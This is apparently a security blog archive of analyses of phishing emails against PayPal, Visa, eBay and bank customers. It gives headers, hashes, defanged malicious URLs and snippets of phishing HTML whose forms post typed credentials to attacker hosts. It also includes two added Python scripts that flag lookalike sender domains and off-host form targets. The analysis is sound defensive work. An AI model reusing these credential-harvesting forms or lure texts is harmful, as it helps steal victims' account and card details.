Tag Archives: phishing

Phishing: Attention ! Votre compte PayPal a ete limite

New phishing email used to spread HTML files with fake PayPal login forms:

[screenshot of the phishing email]

Header details:

Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon,  4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"

There is a ZIP file attached:

File: Informations Compte Paypal .zip
Size: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A

The extracted file is a .HTML file:

File: Informations Compte Paypal .html
Size: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18

From this HTML code:

<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">

we can see that the sensitive data typed into the form is sent to:

hxxp:// byrongoldworks .com /mainbody.php

Report from URLVoid:

[URLVoid report screenshot for byrongoldworks .com]

Phishing: A causa del nostro recente aggiornamento. Verified by Visa

We have logged other phishing emails used to steal details of Visa users:

From - Mon Apr 23 16:04:50 2012
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
Date: Mon, 23 Apr 2012 15.21.34 +0200
To: undisclosed-recipients:;

Note the source of the message in the email header:

Received: from ser.just3d.tv (unknown [91.227.127.33])

It has nothing to do with Visa. Note also the e-mail addresses:

Reply-To: sicurela@visaltalia.it

Note that in visaltalia.it the character after "visa" is an l (lowercase L), not an i: the domain is a lookalike of the visaitalia domain used in the From header.
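As an added example that is not part of the original post, the script below applies the three checks made above to the quoted headers: the Reply-To domain differs from the From domain, the two differ by a single character (the l-for-i swap), and no Received hop belongs to the claimed sender domain. The function names are my own, and the header sample is constructed from the lines quoted above.

```python
import re
from collections import defaultdict

# Constructed sample: the header lines quoted in the post above (the mbox "From -" line is omitted)
RAW_HEADERS = """\
Received: from ser.just3d.tv (unknown [91.227.127.33])
Received: (qmail 23589 invoked by uid 0); 23 Apr 2012 13:21:36 -0000
Received: from unknown (HELO User) (admin@just3d.tv@151.58.16.184)
Reply-To: sicurela@visaltalia.it
From: "verified by visa" verified@visaitalia.com
Subject: A causa del nostro recente aggiornamento.
"""

def parse_headers(raw):
    """Group header values by lower-cased name; repeated headers (Received) keep their order."""
    headers = defaultdict(list)
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()].append(value.strip())
    return headers
def domain_of(value):
    """Domain part of the first address in a header value, lower-cased (None if no address)."""
    m = re.search(r"@([A-Za-z0-9.-]+)", value)
    return m.group(1).lower() if m else None

def edit_distance(a, b):
    """Levenshtein distance, used to spot a one-character lookalike label such as visaltalia vs visaitalia."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def triage_headers(raw):
    """Return findings for the sender inconsistencies discussed in the post (hypothetical helper)."""
    h = parse_headers(raw)
    from_dom = domain_of(h["from"][0]) if h["from"] else None
    reply_dom = domain_of(h["reply-to"][0]) if h["reply-to"] else None
    hops = [m.group(1).lower() for r in h["received"] for m in [re.match(r"from\s+(\S+)", r)] if m]
    findings = []
    if from_dom and reply_dom and reply_dom != from_dom:
        findings.append(f"Reply-To domain {reply_dom} differs from From domain {from_dom}")
        if edit_distance(from_dom.split(".")[0], reply_dom.split(".")[0]) == 1:  # l-for-i swap
            findings.append(f"{reply_dom} is a one-character lookalike of {from_dom}")
    if from_dom and not any(hop == from_dom or hop.endswith("." + from_dom) for hop in hops):
        findings.append(f"no Received hop belongs to {from_dom}; first hop: {hops[0] if hops else 'unknown'}")
    return findings
```

The Received check only looks at hostnames the MTAs recorded; a forged HELO such as "User" in the third hop is exactly why the first, server-recorded hop is the one worth reading.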

The message of the email (translated from Italian):

Dear Customer,
Due to our recent update on our servers
(23/04/2012) it is necessary to update your profile.
For greater security and access, please fill in the
attached form.

Thank you for your cooperation.

Copyright Visa Europe 2012. All rights reserved

There is also an attached file named visaitalia.html:

File: visaitalia.html
Size: 20015 bytes
MD5: 2C76E9F667E78C8C32C09DBE1129969E
SHA1: 0A30FFC20AC311AF2831086D4B181E0F23483399
SHA256: 1757C6A066E61F1B3E9782570712641FC734E1C6ACCD1DA329F3B10B164136CC
SHA384: BD80E5B8A83A3C00D72B6367421AE85CC6A1FF8981F43D0D6784B52D0AAE58B22DD74293BD8735C8B0E4331C8CCCDA02
SHA512: 4B82AC139180E6B19C58A553456BBE30CE155E22A695E300115CAC5C8BDB3F84A024CCDF104E280162B0C44AF1495C850CA3565533DE62EC6F14EF7754295A30

The attached file contains the form used to send the typed details to a remote link. Listed below are a few malicious links extracted from the attached HTML file:

hxxp:// leonidasvancouver .com /admin/plm/plm.html
hxxp:// rottenfish .de /vbv/plm_files/Logo-Mastercard_Secure_Code.gif
hxxp:// rottenfish .de /vbv/plm_files/fin_VerifiedByVisa_186x79.gif
hxxp:// rottenfish .de /vbv/run.php

The malicious websites are flagged as detected by URLVoid:

http://www.urlvoid.com/scan/rottenfish .de/
http://www.urlvoid.com/scan/leonidasvancouver .com/

Phishing: Votre carte bancaire est suspendue

Another email containing a malicious URL, used in a phishing attack against MasterCard and Visa users:

Return-Path: <services@security.com>
Received: from mailrtr1.deltacom.net (mailvip.deltacom.net [72.243.252.244])
Received: from User ([66.0.110.18]) by mailrtr1.deltacom.net (MOS 4.1.10-GA)
From: "visaeurope"<services@security.com>
Subject: Votre carte bancaire est suspendue
Date: Sun, 7 Aug 2011 00:12:08 -0500
To: undisclosed-recipients:;

Email message (translated from French):

Hello Visa card customers,

Your bank card is suspended, because we have encountered a problem on your chart.
We have determined that a person may be using your chart without your authorization.
For your protection, we have suspended your bank account through your credit card. To lift this suspension,

Click here
and follow the indicated procedure to update your account by credit card.

Malicious URL:

hxxp:// jinwonyc.startlogic. com/vbv/visaeurope.fr/europ-pay/visaeurope/securite/login.aspx/

URLVoid Analysis:

http://www.urlvoid.com/scan/jinwonyc.startlogic.com

Phishing: New Unpaid Item Message from jxavier14: #14027471062

Phishing attack against eBay users:

Return-Path: <aw-confirm@mail.aby.fr>
Received: from mail.ktmtalk.com (mail.ktmtalk.com [173.74.246.25])
Received: from User [98.175.62.124] by mail.ktmtalk.com with ESMTP
Reply-To: <aw-confirm@mail.aby.fr>
From: "eBay Member jxavier14"<aw-confirm@mail.aby.fr>
Subject: New Unpaid Item Message from jxavier14: #14027471062 -- response required
Date: Sat, 6 Aug 2011 06:34:47 -0500
To: undisclosed-recipients:;

Email message:

Dear member,
 
eBay member charly1 has left you a message regarding item #14020078062
 
View the dispute thread to respond.

The malicious URL points to:

hxxp:// newcastlelimo .net/ebay-fr/eBayISAPI.dll.htm

Image of the phishing page:

[screenshot of the phishing page]

Note that the connection is NOT secure: the page does not use SSL (HTTPS).

URLVoid Analysis:

http://www.urlvoid.com/scan/newcastlelimo.net

Phishing: Your Paypal Account Will Be Limited

New phishing email related to PayPal accounts:

Return-Path: <servviice@paybal.com>
Received: from WIN-ATAF5I4OOP1 (unknown [96.44.188.43])
Received: from User ([127.0.0.1]) by WIN-ATAF5I4OOP1
From: "Paypal"<servviice@paybal.com>
Subject: Your Paypal Account Will Be Limited
Date: Tue, 17 May 2011 18:38:40 -0700
To: undisclosed-recipients:;

Message:

[screenshot of the email message]

Note that the email comes from:

From: "Paypal"<servviice@paybal.com>

The domain paybal.com is parked!

Malicious URL that redirects to the phishing PayPal login page:

hxxp://www.doncastersc.vic.edu .au/calendar/paypal.secure.update.service/paypal.secure.login/safe.login.process/language&id=en/80a13c0db1f1ff80d546411d7f8a8350c132bc41e0934c/us/webscr.php?cmd=_login-run&dispatch=3885d80a13c0db1f1ff80d546411d7f8a8350c132bc0

URLVoid domain analysis:

http://www.urlvoid.com/scan/paybal.com
http://www.urlvoid.com/scan/doncastersc.vic.edu.au

Phishing: Urgent – Your bank card has been blocked

A user has reported a suspicious email to us:

[screenshot of the reported email]

Headers:

Received: from sds-16.hosteur.com (sds-16.hosteur.com [217.16.9.166])
Received: from www-data by sds-16.hosteur.com with local (Exim 4.69)
Subject: URGENT - Your bank card has been blocked
From: Banking Service <bankservice@service.fr >
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Sender: www-data <www-data@hosteur.com>

The clickable link “Access to your form” redirects to a new (suspicious) URL:

hxxp://servicevbv.us. tf/

[screenshot of the page at servicevbv.us. tf]

URLVoid report:
http://www.urlvoid.com/scan/servicevbv.us.tf

Report: 2011-04-07 16:38:44 (GMT 1)
Website: servicevbv.us.tf
Domain Hash: 91fa19172a89f4c10b8dc0ca8b0460ec
IP Address: 188.40.70.27
IP Hostname: static.27.70.40.188.clients.your-server.de
IP Country: DE (Germany)
AS Number: 24940
AS Name: HETZNER-AS Hetzner Online AG RZ
Detections: 2 / 22 (9 %)
Status: SUSPICIOUS

Analyzing the URL content, we can see suspicious code:

<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<script language="JavaScript" src="/zzz/init.php?D=c2VydmljZXZidi51cy50Zg%3D%3D&L=" type="text/javascript"></script>
<iframe src="hxxp://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px" ></iframe>
<iframe src="hxxp://krystalweb.co.uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php" name="fid1" id="fid1" width="100%" height="100%" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<a href="servicevbv.us.tf">service verified by visa</a>

Why suspicious?

1) The page title looks like a scam
2) Why is the CSS stylesheet located at "/zzz/css.css"?
3) Why is the Google Analytics (?) code located at "/zzz/gas.js"?
4) Why is there an iframe pointing to adboost. com/index6.php?
5) Why is there another iframe pointing to the (long) URL at krystalweb. co. uk?
6) Where is SSL?

The long URL:

hxxp://krystalweb.co. uk/suuport/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/5454SDF8541/update.php

This URL loads the fake form where the user is asked to enter their details. The form then sends (POST) those details to another script, located at yet another (suspicious) URL:

action="hxxp://shopkasa.com. br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method=post>
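The same triage applies to the PayPal attachment earlier on this page (form action on byrongoldworks .com) and to this Visa page: pull every iframe, script, link and form target out of the HTML and compare the hosts with the one serving the page. The script below is an added example, not code from the post; the class and function names are my own, and the sample HTML is constructed from the snippets quoted above (URLs refanged to http).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample built from the snippets quoted above; assumed to be served from servicevbv.us.tf
SAMPLE_HTML = """
<title>service verified by visa</title>
<link href="/zzz/css.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/zzz/gas.js"></script>
<iframe src="http://www.adboost.com/index6.php" frameborder="0" width="486px" height="60px"></iframe>
<iframe src="http://krystalweb.co.uk/suuport/5454SDF8541/update.php" name="fid1" id="fid1"></iframe>
<form action="http://shopkasa.com.br/cgi-bin/CobreBemECommerceDados/HiTman2.php" method="post"></form>
"""

class RefCollector(HTMLParser):
    """Record the page title and every iframe/script/link/form target, in document order."""
    def __init__(self):
        super().__init__()
        self.title, self._in_title, self.refs = "", False, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        self._in_title = tag == "title"
        for attr in ("src", "href", "action"):
            if tag in ("iframe", "script", "link", "form") and a.get(attr):
                self.refs.append((tag, a[attr]))
    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()

def audit_page(html, page_host):
    """Return (title, findings) for a page served from page_host; the checks mirror the list above."""
    p = RefCollector()
    p.feed(html)
    findings = []
    for tag, url in p.refs:
        u = urlparse(url)
        host = (u.hostname or page_host).lower()  # relative URLs resolve to the serving host
        if tag == "iframe" and host != page_host:
            findings.append(f"iframe loads content from {host}")
        if tag == "form" and u.scheme and u.scheme != "https":
            findings.append(f"form submits over cleartext {u.scheme} to {host}")
        if tag == "form" and host != page_host:
            findings.append(f"form posts the typed details to a different host: {host}")
    return p.title, findings
```

Run the audit on a saved copy of the attachment, never on a live fetch from the phishing host; the point is to read the targets, not to visit them.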

URLVoid analysis:
http://www.urlvoid.com/scan/shopkasa.com.br

Recent Phishing Emails Against Banks and CartaSi

Here are a few recent malicious links reported as phishing pages:

[screenshot of a phishing page]

merklin-baiersbronn. de/components/com_mailto/Bankline.php
mooyekindmakelaars. nl/components/com_contact/Bankline.php
linebanks.dominiotemporario. com/inTerneT/nett/
mellylog.altervista. org/templates/beez/REAL.php
mellylog.altervista. org/templates/beez/Santander.php
163.30.82.2 /~user/www.cartasi.it/index.html
66.7.192.115 /~account/CaraSi.it/gtwpages/index.php?id=
organamattress.com /www/bancodesio/index.html

[screenshot of the malicious redirect]

URLVoid reports:

merklin-baiersbronn. de – 81.169.145.158
mooyekindmakelaars. nl – 77.94.248.181
linebanks.dominiotemporario. com – 187.17.98.37
mellylog.altervista. org – –
163.30.82.2
66.7.192.115 – bored1.reallybored.net
organamattress. com – 67.15.55.238